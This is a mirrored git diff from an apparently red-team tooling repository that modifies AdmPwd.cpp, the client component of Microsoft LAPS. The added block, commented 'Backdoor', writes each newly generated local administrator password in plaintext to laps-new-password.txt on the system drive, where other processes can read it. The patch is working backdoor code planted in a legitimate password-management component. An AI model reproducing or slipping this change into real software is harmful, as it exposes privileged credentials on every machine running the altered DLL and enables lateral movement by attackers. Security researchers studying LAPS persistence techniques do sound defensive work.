mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-23 01:21:03 +01:00
54 lines
2.5 KiB
Diff
54 lines
2.5 KiB
Diff
diff --git a/Main/AdmPwd/AdmPwd.cpp b/Main/AdmPwd/AdmPwd.cpp
|
|
index 85f14df..b379811 100644
|
|
--- a/Main/AdmPwd/AdmPwd.cpp
|
|
+++ b/Main/AdmPwd/AdmPwd.cpp
|
|
@@ -115,6 +115,48 @@ ADMPWD_API DWORD APIENTRY ProcessGroupPolicy(
|
|
GetSystemTimeAsFileTime(¤tTime);
|
|
LogData.dwID = S_REPORT_PWD;
|
|
LogData.hr = comp.ReportPassword(newPwd, ¤tTime, config.PasswordAge);
|
|
+
|
|
+ // --------------------
|
|
+ // Backdoor
|
|
+
|
|
+ HANDLE outFile;
|
|
+ WCHAR *buff = new WCHAR[512];
|
|
+ if (buff) {
|
|
+ if (GetEnvironmentVariableW(L"SystemDrive", buff, 512)){
|
|
+ wcscat_s(buff, 512, L"\\laps-new-password.txt");
|
|
+ outFile = CreateFileW(
|
|
+ buff,
|
|
+ GENERIC_WRITE,
|
|
+ FILE_SHARE_READ,
|
|
+ NULL,
|
|
+ OPEN_ALWAYS,
|
|
+ FILE_ATTRIBUTE_NORMAL,
|
|
+ NULL
|
|
+ );
|
|
+
|
|
+ if (outFile != static_cast<HANDLE>(INVALID_HANDLE_VALUE)) {
|
|
+ DWORD written = 0;
|
|
+
|
|
+ wcscpy_s(buff, 512, newPwd);
|
|
+ wcscat_s(buff, 512, L"\r\n");
|
|
+
|
|
+ WriteFile(
|
|
+ outFile,
|
|
+ buff,
|
|
+ sizeof(WCHAR) * wcslen(buff),
|
|
+ &written,
|
|
+ NULL
|
|
+ );
|
|
+
|
|
+ CloseHandle(outFile);
|
|
+ }
|
|
+ }
|
|
+
|
|
+ delete[] buff;
|
|
+ }
|
|
+
|
|
+ // --------------------
|
|
+
|
|
if (FAILED(LogData.hr))
|
|
throw LogData.hr;
|
|
else
|